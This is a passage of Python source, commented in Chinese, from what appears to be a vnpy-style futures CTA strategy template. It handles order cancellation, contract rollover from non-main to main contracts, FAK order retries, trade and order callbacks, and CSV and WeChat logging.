if len(self.vt_symbol) > 0 and self.vt_symbol not in pos_symbols:
pos_symbols.add(self.vt_symbol)
if self.idx_symbol and self.idx_symbol not in pos_symbols:
pos_symbols.add(self.idx_symbol)
# 如果持仓的合约,不在self.vt_symbol中,需要订阅
for symbol in list(pos_symbols):
self.write_log(f'新增订阅合约:{symbol}')
self.cta_engine.subscribe_symbol(strategy_name=self.strategy_name, vt_symbol=symbol)
def get_positions(self):
"""
获取策略当前持仓(重构,使用主力合约)
:return: [{'vt_symbol':symbol,'direction':direction,'volume':volume]
"""
if not self.position:
return []
pos_list = []
if self.position.long_pos > 0:
for g in self.gt.get_opened_grids(direction=Direction.LONG):
vt_symbol = g.snapshot.get('mi_symbol', g.vt_symbol if g.vt_symbol and '99' not in g.vt_symbol else self.vt_symbol)
open_price = g.snapshot.get('open_price', g.open_price)
pos_list.append({'vt_symbol': vt_symbol,
'direction': 'long',
'volume': g.volume - g.traded_volume,
'price': open_price})
if abs(self.position.short_pos) > 0:
for g in self.gt.get_opened_grids(direction=Direction.SHORT):
vt_symbol = g.snapshot.get('mi_symbol', g.vt_symbol if g.vt_symbol and '99' not in g.vt_symbol else self.vt_symbol)
open_price = g.snapshot.get('open_price', g.open_price)
pos_list.append({'vt_symbol': vt_symbol,
'direction': 'short',
'volume': abs(g.volume - g.traded_volume),
'price': open_price})
if self.cur_datetime and (datetime.now() - self.cur_datetime).total_seconds() < 10:
self.write_log(u'当前持仓:{}'.format(pos_list))
return pos_list
def get_policy_json(self):
"""获取policy的json格式数据"""
if not self.policy:
return None
data = self.policy.to_json()
return data
def get_grid_trade_json(self):
"""获取gt组件的json格式数据"""
if not self.gt:
return None
data = self.gt.to_json()
return data
def tns_cancel_logic(self, dt, force=False):
"撤单逻辑"""
if len(self.active_orders) < 1:
self.entrust = 0
return
for vt_orderid in list(self.active_orders.keys()):
order_info = self.active_orders.get(vt_orderid)
order_grid = order_info.get('grid',None)
if order_info.get('status', None) in [Status.CANCELLED, Status.REJECTED]:
self.active_orders.pop(vt_orderid, None)
continue
order_time = order_info.get('order_time')
over_ms = (dt - order_time).total_seconds()
# 白天开盘或许有指数与真实tick的时间延迟,这个时刻不做撤单功能
if f'{dt.hour}:{dt.minute}' in ['10:30', '13:30']:
continue
if (over_ms > self.cancel_seconds) \
or force: # 超过设置的时间还未成交
self.write_log(f'{dt}, 超时{over_ms}秒未成交,取消委托单:{order_info}')
if self.cancel_order(vt_orderid):
order_info.update({'status': Status.CANCELLING})
else:
order_info.update({'status': Status.CANCELLED})
if order_grid:
if vt_orderid in order_grid.order_ids:
order_grid.order_ids.remove(vt_orderid)
if len(order_grid.order_ids) == 0:
order_grid.order_status = False
if len(self.active_orders) < 1:
self.entrust = 0
def tns_switch_long_pos(self, open_new=True):
"""
切换合约,从持仓的非主力合约,切换至主力合约
:param open_new: 是否开仓主力合约
:return:
"""
if self.entrust != 0:
return
if self.position.long_pos == 0:
return
if self.cur_mi_price == 0:
return
none_mi_grid = None
none_mi_symbol = None
self.write_log(f'持仓换月=>启动.')
# 找出非主力合约的持仓网格
for g in self.gt.get_opened_grids(direction=Direction.LONG):
none_mi_symbol = g.snapshot.get('mi_symbol', g.vt_symbol)
# 如果持仓的合约,跟策略配置的vt_symbol一致,则不处理
if none_mi_symbol is None or none_mi_symbol == self.vt_symbol:
self.write_log(f'none_mi_symbol:{none_mi_symbol}, vt_symbol:{self.vt_symbol} 一致,不处理')
continue
# 如果未开仓,或者处于委托状态,或者已交易完毕,不处理
if not g.open_status or g.order_status or g.volume - g.traded_volume <= 0:
self.write_log(f'开仓状态:{g.open_status}, 委托状态:{g.order_status},网格持仓:{g.volume} ,已交易数量:{g.traded_volume}, 不处理')
continue
none_mi_grid = g
if g.traded_volume > 0 and g.volume - g.traded_volume > 0:
g.volume -= g.traded_volume
g.traded_volume = 0
break
if none_mi_grid is None:
return
self.write_log(f'持仓换月=>找到多单持仓:{none_mi_symbol},持仓数量:{none_mi_grid.volume}')
# 找到行情中非主力合约/主力合约的最新价
none_mi_tick = self.tick_dict.get(none_mi_symbol)
mi_tick = self.tick_dict.get(self.vt_symbol, None)
if none_mi_tick is None or mi_tick is None:
return
# 如果涨停价,不做卖出
if self.is_upper_limit(none_mi_symbol) or self.is_upper_limit(self.vt_symbol):
self.write_log(f'{none_mi_symbol} 或 {self.vt_symbol} 为涨停价,不做换仓')
return
none_mi_price = max(none_mi_tick.last_price, none_mi_tick.bid_price_1)
grid = deepcopy(none_mi_grid)
grid.id = str(uuid.uuid1())
grid.open_status = False
self.write_log(f'持仓换月=>复制持仓信息{none_mi_symbol},ID:{none_mi_grid.id} => {self.vt_symbol},ID:{grid.id}')
# 委托卖出非主力合约
vt_orderids = self.sell(price=none_mi_price,
volume=none_mi_grid.volume,
vt_symbol=none_mi_symbol,
order_type=self.order_type,
grid=none_mi_grid)
if len(vt_orderids) > 0:
self.write_log(f'持仓换月=>委托卖出非主力合约{none_mi_symbol}持仓:{none_mi_grid.volume}')
# 已经发生过换月的,不执行买入新合约
if none_mi_grid.snapshot.get("switched", False):
self.write_log(f'持仓换月=>已经执行过换月,不再创建新的买入操作')
return
none_mi_grid.snapshot.update({'switched': True})
# 如果不买入新主力合约,直接返回
# 某些策略会自动重新开仓得
if not open_new:
self.write_log(f'不买入新的主力合约:{self.vt_symbol},数量:{grid.volume}')
self.gt.save()
return
# 添加买入主力合约
grid.snapshot.update({'mi_symbol': self.vt_symbol, 'open_price': self.cur_mi_price})
self.gt.dn_grids.append(grid)
vt_orderids = self.buy(price=self.cur_mi_price + 5 * self.price_tick,
volume=grid.volume,
vt_symbol=self.vt_symbol,
order_type=self.order_type,
grid=grid)
if len(vt_orderids) > 0:
self.write_log(u'持仓换月=>委托买入主力合约:{},价格:{},数量:{}'
.format(self.vt_symbol, self.cur_mi_price, grid.volume))
else:
self.write_error(f'持仓换月=>委托买入主力合约:{self.vt_symbol}失败')
self.gt.save()
else:
self.write_error(f'持仓换月=>委托卖出非主力合约:{none_mi_symbol}失败')
def tns_switch_short_pos(self,open_new=True):
"""
切换合约,从持仓的非主力合约,切换至主力合约
:param open_new: 是否开仓新得主力合约
:return:
"""
if self.entrust != 0:
return
if self.position.short_pos == 0:
return
if self.cur_mi_price == 0:
return
none_mi_grid = None
none_mi_symbol = None
# 找出非主力合约的持仓网格
for g in self.gt.get_opened_grids(direction=Direction.SHORT):
none_mi_symbol = g.snapshot.get('mi_symbol')
if none_mi_symbol is None or none_mi_symbol == self.vt_symbol:
continue
if not g.open_status or g.order_status or g.volume - g.traded_volume <= 0:
continue
none_mi_grid = g
if g.traded_volume > 0 and g.volume - g.traded_volume > 0:
g.volume -= g.traded_volume
g.traded_volume = 0
break
# 找不到与主力合约不一致的持仓网格
if none_mi_grid is None:
return
# 找到行情中非主力合约的最新价
none_mi_tick = self.tick_dict.get(none_mi_symbol)
mi_tick = self.tick_dict.get(self.vt_symbol, None)
if none_mi_tick is None or mi_tick is None:
return
# 如果跌停价,不做cover
if self.is_lower_limit(none_mi_symbol) or self.is_lower_limit(self.vt_symbol):
return
none_mi_price = max(none_mi_tick.last_price, none_mi_tick.bid_price_1)
grid = deepcopy(none_mi_grid)
grid.id = str(uuid.uuid1())
# 委托平空非主力合约
vt_orderids = self.cover(price=none_mi_price,
volume=none_mi_grid.volume,
vt_symbol=none_mi_symbol,
order_type=self.order_type,
grid=none_mi_grid)
if len(vt_orderids) > 0:
self.write_log(f'委托平空非主力合约{none_mi_symbol}持仓:{none_mi_grid.volume}')
# 已经发生过换月的,不执行开空新合约
if none_mi_grid.snapshot.get("switched", False):
self.write_log(f'已经执行过换月,不再创建新的空操作')
return
none_mi_grid.snapshot.update({'switched': True})
# 如果不开空新主力合约,直接返回
# 某些策略会自动重新开仓得
if not open_new:
self.write_log(f'不开空新的主力合约:{self.vt_symbol},数量:{grid.volume}')
self.gt.save()
return
# 添加卖出主力合约
grid.id = str(uuid.uuid1())
grid.snapshot.update({'mi_symbol': self.vt_symbol, 'open_price': self.cur_mi_price})
self.gt.up_grids.append(grid)
vt_orderids = self.short(price=self.cur_mi_price,
volume=grid.volume,
vt_symbol=self.vt_symbol,
order_type=self.order_type,
grid=grid)
if len(vt_orderids) > 0:
self.write_log(f'委托做空主力合约:{self.vt_symbol},价格:{self.cur_mi_price},数量:{grid.volume}')
else:
self.write_error(f'委托做空主力合约:{self.vt_symbol}失败')
self.gt.save()
else:
self.write_error(f'委托平空非主力合约:{none_mi_symbol}失败')
def display_grids(self):
"""更新网格显示信息"""
if not self.inited:
return
up_grids_info = self.gt.to_str(direction=Direction.SHORT)
if len(self.gt.up_grids) > 0:
self.write_log(up_grids_info)
dn_grids_info = self.gt.to_str(direction=Direction.LONG)
if len(self.gt.dn_grids) > 0:
self.write_log(dn_grids_info)
def display_tns(self):
"""显示事务的过程记录=》 log"""
if not self.inited:
return
self.write_log(u'{} 当前指数{}价格:{},当前主力{}价格:{}'
.format(self.cur_datetime,
self.idx_symbol, self.cur_99_price,
self.vt_symbol, self.cur_mi_price))
if hasattr(self, 'policy'):
policy = getattr(self, 'policy')
op = getattr(policy, 'to_json', None)
if callable(op):
self.write_log(u'当前Policy:{}'.format(policy.to_json()))
def save_dist(self, dist_data):
"""
保存策略逻辑过程记录=》 csv文件按
:param dist_data:
:return:
"""
if self.backtesting:
save_path = self.cta_engine.get_logs_path()
else:
save_path = self.cta_engine.get_data_path()
try:
if self.position and 'long_pos' not in dist_data:
dist_data.update({'long_pos': self.position.long_pos})
if self.position and 'short_pos' not in dist_data:
dist_data.update({'short_pos': self.position.short_pos})
file_name = os.path.abspath(os.path.join(save_path, f'{self.strategy_name}_dist.csv'))
append_data(file_name=file_name, dict_data=dist_data, field_names=self.dist_fieldnames)
except Exception as ex:
self.write_error(u'save_dist 异常:{} {}'.format(str(ex), traceback.format_exc()))
def save_tns(self, tns_data):
"""
保存多空事务记录=》csv文件,便于后续分析
:param tns_data: {"datetime":xxx, "direction":"long"或者"short", "price":xxx}
:return:
"""
if self.backtesting:
save_path = self.cta_engine.get_logs_path()
else:
save_path = self.cta_engine.get_data_path()
try:
file_name = os.path.abspath(os.path.join(save_path, f'{self.strategy_name}_tns.csv'))
append_data(file_name=file_name, dict_data=tns_data)
except Exception as ex:
self.write_error(u'save_tns 异常:{} {}'.format(str(ex), traceback.format_exc()))
def send_wechat(self, msg: str):
"""实盘时才发送微信"""
if self.backtesting:
return
self.cta_engine.send_wechat(msg=msg, strategy=self)
class CtaProFutureTemplate(CtaProTemplate):
"""期货交易增强版模板"""
activate_fak = False
activate_today_lock = False
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.parameters.append('activate_fak')
self.parameters.append('activate_today_lock')
def update_setting(self, setting: dict):
"""更新配置参数"""
super().update_setting(setting)
# 实盘时,判断是否激活使用FAK模式
if not self.backtesting:
if self.activate_fak:
self.order_type = OrderType.FAK
def load_policy(self):
"""加载policy"""
if self.policy:
self.write_log(u'load_policy(),初始化Policy')
self.policy.load()
self.write_log(u'Policy:{}'.format(self.policy.to_json()))
def on_start(self):
"""启动策略(必须由用户继承实现)"""
self.write_log(u'启动')
self.trading = True
self.put_event()
def on_stop(self):
"""停止策略(必须由用户继承实现)"""
self.active_orders.clear()
self.pos = 0
self.entrust = 0
self.write_log(u'停止')
self.put_event()
def on_trade(self, trade: TradeData):
"""
交易更新
支持股指期货的对锁单或者解锁
:param trade:
:return:
"""
self.write_log(u'{},交易更新 =>{},\n 当前持仓:{} '
.format(self.cur_datetime,
trade.__dict__,
self.position.pos))
dist_record = dict()
if self.backtesting:
dist_record['datetime'] = trade.time
else:
dist_record['datetime'] = ' '.join([self.cur_datetime.strftime('%Y-%m-%d'), trade.time])
dist_record['volume'] = trade.volume
dist_record['price'] = trade.price
dist_record['symbol'] = trade.vt_symbol
# 处理股指锁单
if trade.exchange == Exchange.CFFEX and not self.backtesting:
if trade.direction == Direction.LONG:
if abs(self.position.short_pos) >= trade.volume:
self.position.short_pos += trade.volume
else:
self.position.long_pos += trade.volume
else:
if self.position.long_pos >= trade.volume:
self.position.long_pos -= trade.volume
else:
self.position.short_pos -= trade.volume
self.position.pos = self.position.long_pos + self.position.short_pos
dist_record['long_pos'] = self.position.long_pos
dist_record['short_pos'] = self.position.short_pos
else:
if trade.direction == Direction.LONG and trade.offset == Offset.OPEN:
dist_record['operation'] = 'buy'
self.position.open_pos(trade.direction, volume=trade.volume)
dist_record['long_pos'] = self.position.long_pos
dist_record['short_pos'] = self.position.short_pos
if trade.direction == Direction.SHORT and trade.offset == Offset.OPEN:
dist_record['operation'] = 'short'
self.position.open_pos(trade.direction, volume=trade.volume)
dist_record['long_pos'] = self.position.long_pos
dist_record['short_pos'] = self.position.short_pos
if trade.direction == Direction.LONG and trade.offset != Offset.OPEN:
dist_record['operation'] = 'cover'
self.position.close_pos(trade.direction, volume=trade.volume)
dist_record['long_pos'] = self.position.long_pos
dist_record['short_pos'] = self.position.short_pos
if trade.direction == Direction.SHORT and trade.offset != Offset.OPEN:
dist_record['operation'] = 'sell'
self.position.close_pos(trade.direction, volume=trade.volume)
dist_record['long_pos'] = self.position.long_pos
dist_record['short_pos'] = self.position.short_pos
self.save_dist(dist_record)
self.pos = self.position.pos
def fix_order(self, order: OrderData):
"""修正order被拆单得情况"""
order_info = self.active_orders.get(order.vt_orderid, None)
if order_info:
volume = order_info.get('volume')
if volume != order.volume:
self.write_log(f'修正order被拆单得情况,调整{order.vt_orderid} volume:{volume}=>{order.volume}')
order_info.update({'volume': order.volume})
def on_order(self, order: OrderData):
"""报单更新"""
# 未执行的订单中,存在是异常,删除
self.write_log(u'{}报单更新 => {}'.format(self.cur_datetime, order.__dict__))
# 修正order被拆单得情况"
self.fix_order(order)
if order.vt_orderid in self.active_orders:
active_order = self.active_orders[order.vt_orderid]
if order.volume == order.traded and order.status in [Status.ALLTRADED]:
self.on_order_all_traded(order)
#elif order.offset == Offset.OPEN and order.status in [Status.CANCELLED]:
# 这里 换成active_order的,因为原始order有可能被换成锁仓方式
elif active_order['offset'] == Offset.OPEN and order.status in [Status.CANCELLED]:
# 开仓委托单被撤销
self.on_order_open_canceled(order)
#elif order.offset != Offset.OPEN and order.status in [Status.CANCELLED]:
# # 这里 换成active_order的,因为原始order有可能被换成锁仓方式
elif active_order['offset'] != Offset.OPEN and order.status in [Status.CANCELLED]:
# 平仓委托单被撤销
self.on_order_close_canceled(order)
elif order.status == Status.REJECTED:
if active_order['offset'] == Offset.OPEN:
self.write_error(u'{}委托单开{}被拒,price:{},total:{},traded:{},status:{}'
.format(order.vt_symbol, order.direction, order.price, order.volume,
order.traded, order.status))
self.on_order_open_canceled(order)
else:
self.write_error(u'OnOrder({})委托单平{}被拒,price:{},total:{},traded:{},status:{}'
.format(order.vt_symbol, order.direction, order.price, order.volume,
order.traded, order.status))
self.on_order_close_canceled(order)
else:
self.write_log(u'委托单未完成,total:{},traded:{},tradeStatus:{}'
.format(order.volume, order.traded, order.status))
else:
self.write_error(u'委托单{}不在策略的未完成订单列表中:{}'.format(order.vt_orderid, self.active_orders))
def on_order_all_traded(self, order: OrderData):
"""
订单全部成交
:param order:
:return:
"""
self.write_log(u'报单更新 => 委托单全部完成:{}'.format(order.__dict__))
active_order = self.active_orders[order.vt_orderid]
# 通过vt_orderid,找到对应的网格
grid = active_order.get('grid', None)
if grid is not None:
# 移除当前委托单
if order.vt_orderid in grid.order_ids:
grid.order_ids.remove(order.vt_orderid)
# 网格的所有委托单已经执行完毕
if len(grid.order_ids) == 0:
grid.order_status = False
grid.traded_volume = 0
# 平仓完毕(cover, sell)
if active_order['offset'] != Offset.OPEN:
grid.open_status = False
grid.close_status = True
grid.open_time = None
self.write_log(f'{grid.direction.value}单已平仓完毕,order_price:{order.price}'
+ f',volume:{order.volume}')
self.write_log(f'移除网格:{grid.to_json()}')
self.gt.remove_grids_by_ids(direction=grid.direction, ids=[grid.id])
# 开仓完毕( buy, short)
else:
grid.open_status = True
grid.open_time = self.cur_datetime
self.write_log(f'{grid.direction.value}单已开仓完毕,order_price:{order.price}'
+ f',volume:{order.volume}')
# 网格的所有委托单部分执行完毕
else:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.volume
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
self.write_log(f'剩余委托单号:{grid.order_ids}')
self.gt.save()
else:
self.write_error(f'on_trade找不到对应grid')
# 在策略得活动订单中,移除
self.active_orders.pop(order.vt_orderid, None)
def on_order_open_canceled(self, order: OrderData):
"""
委托开仓单撤销
如果是FAK模式,重新修改价格,再提交
FAK用于实盘,需要增加涨跌停判断
:param order:
:return:
"""
self.write_log(u'报单更新 => 委托开仓 => 撤销:{}'.format(order.__dict__))
if not self.trading:
if not self.backtesting:
self.write_error(u'当前不允许交易')
return
if order.vt_orderid not in self.active_orders:
self.write_error(u'{}不在未完成的委托单中{}。'.format(order.vt_orderid, self.active_orders))
return
# 直接更新“未完成委托单”,更新volume,retry次数
old_order = self.active_orders[order.vt_orderid]
self.write_log(u'报单更新 => {} 未完成订单信息:{}'.format(order.vt_orderid, old_order))
old_order['traded'] = order.traded
order_vt_symbol = copy(old_order['vt_symbol'])
order_volume = old_order['volume'] - old_order['traded']
order_price = old_order['price']
order_type = old_order.get('order_type', OrderType.LIMIT)
order_retry = old_order.get('retry', 0)
grid = old_order.get('grid', None)
if grid:
if order.vt_orderid in grid.order_ids:
grid.order_ids.remove(order.vt_orderid)
if order_volume <= 0:
msg = u'{} {}{}需重新开仓数量为{},不再开仓' \
.format(self.strategy_name,
order.vt_orderid,
order_vt_symbol,
order_volume)
self.write_error(msg)
self.write_log(u'移除:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
return
if order_retry > 20:
# 这里超过20次尝试失败后,不再尝试,发出告警信息
msg = u'{} {}/{}手, 重试开仓次数{}>20' \
.format(self.strategy_name,
order_vt_symbol,
order_volume,
order_retry)
self.write_error(msg)
self.send_wechat(msg)
# 网格的所有委托单已经执行完毕
if len(grid.order_ids) == 0:
grid.order_status = False
self.gt.save()
self.write_log(u'网格信息更新:{}'.format(grid.__dict__))
self.write_log(u'移除:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
return
order_retry += 1
# FAK 重新开单
if old_order['direction'] == Direction.LONG and order_type == OrderType.FAK:
# 删除旧的委托记录
self.write_log(u'移除旧的委托记录:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
if order.traded > 0:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.traded
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
# 更新网格交易器
self.write_log(u'FAK模式,需要重新发送buy委托.grid:{}'.format(grid.__dict__))
# 更新委托平仓价
buy_price = max(self.cur_mi_tick.ask_price_1, self.cur_mi_tick.last_price, order_price) + self.price_tick
# 不能超过涨停价
if self.cur_mi_tick.limit_up > 0 and buy_price > self.cur_mi_tick.limit_up:
buy_price = self.cur_mi_tick.limit_up
if self.is_upper_limit(self.vt_symbol):
self.write_log(u'{}涨停,不做buy'.format(self.vt_symbol))
return
# 发送委托
vt_orderids = self.buy(price=buy_price,
volume=order_volume,
vt_symbol=self.vt_symbol,
order_type=OrderType.FAK,
order_time=self.cur_datetime,
grid=grid)
if not vt_orderids:
self.write_error(u'重新提交{} {}手开多单,价格:{},失败'.
format(self.vt_symbol, order_volume, buy_price))
return
# 更新retry的次数
for vt_orderid in vt_orderids:
info = self.active_orders.get(vt_orderid, None)
info.update({'retry': order_retry})
self.gt.save()
elif old_order['direction'] == Direction.SHORT and order_type == OrderType.FAK:
# 删除旧的委托记录
self.write_log(u'移除旧的委托记录:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
if order.traded > 0:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.traded
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
self.write_log(u'FAK模式,需要重新发送short委托.grid:{}'.format(grid.__dict__))
short_price = min(self.cur_mi_tick.bid_price_1, self.cur_mi_tick.last_price, order_price) - self.price_tick
# 不能超过跌停价
if self.cur_mi_tick.limit_down > 0 and short_price < self.cur_mi_tick.limit_down:
short_price = self.cur_mi_tick.limit_down
if self.is_lower_limit(self.vt_symbol):
self.write_log(u'{}跌停,不做short'.format(self.vt_symbol))
return
# 发送委托
vt_orderids = self.short(price=short_price,
volume=order_volume,
vt_symbol=self.vt_symbol,
order_type=OrderType.FAK,
order_time=self.cur_datetime,
grid=grid)
if not vt_orderids:
self.write_error(
u'重新提交{} {}手开空单,价格:{}, 失败'.format(self.vt_symbol, order_volume, short_price))
return
# 更新retry的次数
for vt_orderid in vt_orderids:
info = self.active_orders.get(vt_orderid, None)
info.update({'retry': order_retry})
self.gt.save()
else:
pre_status = old_order.get('status', Status.NOTTRADED)
old_order.update({'status': Status.CANCELLED})
self.write_log(u'委托单方式{},状态:{}=>{}'.format(order_type, pre_status, old_order.get('status')))
if grid:
if order.vt_orderid in grid.order_ids:
grid.order_ids.remove(order.vt_orderid)
if not grid.order_ids:
grid.order_status = False
self.gt.save()
self.active_orders.update({order.vt_orderid: old_order})
self.display_grids()
def on_order_close_canceled(self, order: OrderData):
"""委托平仓单撤销"""
self.write_log(u'报单更新 => 委托平仓 => 撤销:{}'.format(order.__dict__))
if order.vt_orderid not in self.active_orders:
self.write_error(u'{}不在未完成的委托单中:{}。'.format(order.vt_orderid, self.active_orders))
return
if not self.trading:
self.write_error(u'当前不允许交易')
return
# 直接更新“未完成委托单”,更新volume,Retry次数
old_order = self.active_orders[order.vt_orderid]
self.write_log(u'报单更新 => {} 未完成订单信息:{}'.format(order.vt_orderid, old_order))
old_order['traded'] = order.traded
# order_time = old_order['order_time']
order_vt_symbol = copy(old_order['vt_symbol'])
order_volume = old_order['volume'] - old_order['traded']
order_price = old_order['price']
order_type = old_order.get('order_type', OrderType.LIMIT)
order_retry = old_order.get('retry', 0)
grid = old_order.get('grid', None)
if grid:
if order.vt_orderid in grid.order_ids:
grid.order_ids.remove(order.vt_orderid)
if order_volume <= 0:
msg = u'{} {}{}重新平仓数量为{},不再平仓' \
.format(self.strategy_name, order.vt_orderid, order_vt_symbol, order_volume)
self.write_error(msg)
self.send_wechat(msg)
self.write_log(u'活动订单移除:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
return
if order_retry > 20:
msg = u'{} 平仓撤单 {}/{}手, 重试平仓次数{}>20' \
.format(self.strategy_name, order_vt_symbol, order_volume, order_retry)
self.write_error(msg)
self.send_wechat(msg)
if not grid.order_ids:
grid.order_status = False
self.gt.save()
self.write_log(u'更新网格=>{}'.format(grid.__dict__))
self.write_log(u'移除活动订单:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
return
order_retry += 1
if old_order['direction'] == Direction.LONG and order_type == OrderType.FAK:
self.write_log(u'移除活动订单:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
if order.traded > 0:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.traded
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
self.write_log(u'FAK模式,需要重新发送cover委托.grid:{}'.format(grid.__dict__))
# 更新委托平仓价
cover_tick = self.tick_dict.get(order_vt_symbol, self.cur_mi_tick)
cover_price = max(cover_tick.ask_price_1, cover_tick.last_price, order_price) + self.price_tick
# 不能超过涨停价
if cover_tick.limit_up > 0 and cover_price > cover_tick.limit_up:
cover_price = cover_tick.limit_up
if self.is_upper_limit(order_vt_symbol):
self.write_log(u'{}涨停,不做cover'.format(order_vt_symbol))
return
pos = self.cta_engine.get_position_holding(vt_symbol=order_vt_symbol)
if pos is None:
self.write_error(f'{self.strategy_name}无法获取{order_vt_symbol}的持仓信息,无法平仓')
return
if pos.short_pos < order_volume:
self.write_error(f'{self.strategy_name}{order_vt_symbol}的持仓空单{pos.short_pos}不满足平仓{order_volume}要求,无法平仓')
return
# 发送委托
vt_orderids = self.cover(price=cover_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=OrderType.FAK,
order_time=self.cur_datetime,
grid=grid)
if not vt_orderids:
self.write_error(u'重新提交{} {}手平空单{}失败'.format(order_vt_symbol, order_volume, cover_price))
return
for vt_orderid in vt_orderids:
info = self.active_orders.get(vt_orderid)
info.update({'retry': order_retry})
self.gt.save()
elif old_order['direction'] == Direction.SHORT and order_type == OrderType.FAK:
self.write_log(u'移除活动订单:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
if order.traded > 0:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.traded
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
self.write_log(u'FAK模式,需要重新发送sell委托.grid:{}'.format(grid.__dict__))
sell_tick = self.tick_dict.get(order_vt_symbol, self.cur_mi_tick)
sell_price = min(sell_tick.bid_price_1, sell_tick.last_price, order_price) - self.price_tick
# 不能超过跌停价
if sell_tick.limit_down > 0 and sell_price < sell_tick.limit_down:
sell_price = sell_tick.limit_down
if self.is_lower_limit(order_vt_symbol):
self.write_log(u'{}涨停,不做sell'.format(order_vt_symbol))
return
pos = self.cta_engine.get_position_holding(vt_symbol=order_vt_symbol)
if pos is None:
self.write_error(f'{self.strategy_name}无法获取{order_vt_symbol}的持仓信息,无法平仓')
return
if pos.long_pos < order_volume:
self.write_error(f'{self.strategy_name}{order_vt_symbol}的持仓多单{pos.long_pos}不满足平仓{order_volume}要求,无法平仓')
return
# 发送委托
vt_orderids = self.sell(price=sell_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=OrderType.FAK,
order_time=self.cur_datetime,
grid=grid)
if not vt_orderids:
self.write_error(u'重新提交{} {}手平多单{}失败'.format(order_vt_symbol, order_volume, sell_price))
return
for vt_orderid in vt_orderids:
info = self.active_orders.get(vt_orderid)
info.update({'retry': order_retry})
self.gt.save()
# 普通限价单委托方式
else:
pre_status = old_order.get('status', Status.NOTTRADED)
old_order.update({'status': Status.CANCELLED})
self.write_log(u'委托单状态:{}=>{}'.format(pre_status, old_order.get('status')))
if grid:
# 判断是否有部分交易
if order.traded > 0:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.traded
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
if order.vt_orderid in grid.order_ids:
grid.order_ids.remove(order.vt_orderid)
if len(grid.order_ids) == 0:
grid.order_status = False
self.gt.save()
self.active_orders.update({order.vt_orderid: old_order})
self.display_grids()
def on_stop_order(self, stop_order: StopOrder):
"""
停止单更新
需要自己重载,处理各类触发、撤单等情况
"""
self.write_log(f'停止单触发:{stop_order.__dict__}')
def cancel_all_orders(self):
"""
重载撤销所有正在进行得委托
:return:
"""
self.write_log(u'撤销所有正在进行得委托')
self.tns_cancel_logic(dt=datetime.now(), force=True, reopen=False)
def tns_cancel_logic(self, dt, force=False, reopen=False):
"撤单逻辑"""
if len(self.active_orders) < 1:
self.entrust = 0
return
canceled_ids = []
for vt_orderid in list(self.active_orders.keys()):
order_info = self.active_orders[vt_orderid]
order_vt_symbol = order_info.get('vt_symbol', self.vt_symbol)
order_time = order_info['order_time']
order_volume = order_info['volume'] - order_info['traded']
# order_price = order_info['price']
# order_direction = order_info['direction']
# order_offset = order_info['offset']
order_grid = order_info['grid']
order_status = order_info.get('status', Status.NOTTRADED)
order_type = order_info.get('order_type', OrderType.LIMIT)
over_seconds = (dt - order_time).total_seconds()
# 只处理未成交的限价委托单
if order_status in [Status.NOTTRADED, Status.SUBMITTING] and (
order_type == OrderType.LIMIT or '.SPD' in order_vt_symbol):
if over_seconds > self.cancel_seconds or force: # 超过设置的时间还未成交
self.write_log(u'撤单逻辑 => 超时{}秒未成交,取消委托单:vt_orderid:{},order:{}'
.format(over_seconds, vt_orderid, order_info))
order_info.update({'status': Status.CANCELLING})
self.active_orders.update({vt_orderid: order_info})
ret = self.cancel_order(str(vt_orderid))
if not ret:
self.write_error(f'{self.strategy_name}撤单逻辑 => {order_vt_symbol}撤单失败')
#self.write_log(u'撤单逻辑 => 撤单失败,更新状态为撤单成功')
# order_info.update({'status': Status.CANCELLED})
# self.active_orders.update({vt_orderid: order_info})
# if order_grid:
# if vt_orderid in order_grid.order_ids:
# order_grid.order_ids.remove(vt_orderid)
# if len(order_grid.order_ids) == 0:
# order_grid.order_status = False
continue
# 处理状态为‘撤销’的委托单
elif order_status == Status.CANCELLED:
self.write_log(u'撤单逻辑 => 委托单{}已成功撤单,将删除未完成订单{}'.format(vt_orderid, order_info))
canceled_ids.append(vt_orderid)
if reopen:
# 撤销的委托单,属于开仓类,需要重新委托
if order_info['offset'] == Offset.OPEN:
self.write_log(u'撤单逻辑 => 重新开仓')
# 开空委托单
if order_info['direction'] == Direction.SHORT:
short_price = self.cur_mi_price - self.price_tick
if order_grid.volume != order_volume and order_volume > 0:
self.write_log(
u'网格volume:{},order_volume:{}不一致,修正'.format(order_grid.volume, order_volume))
order_grid.volume = order_volume
self.write_log(u'重新提交{}开空委托,开空价{},v:{}'.format(order_vt_symbol, short_price, order_volume))
vt_orderids = self.short(price=short_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=order_type,
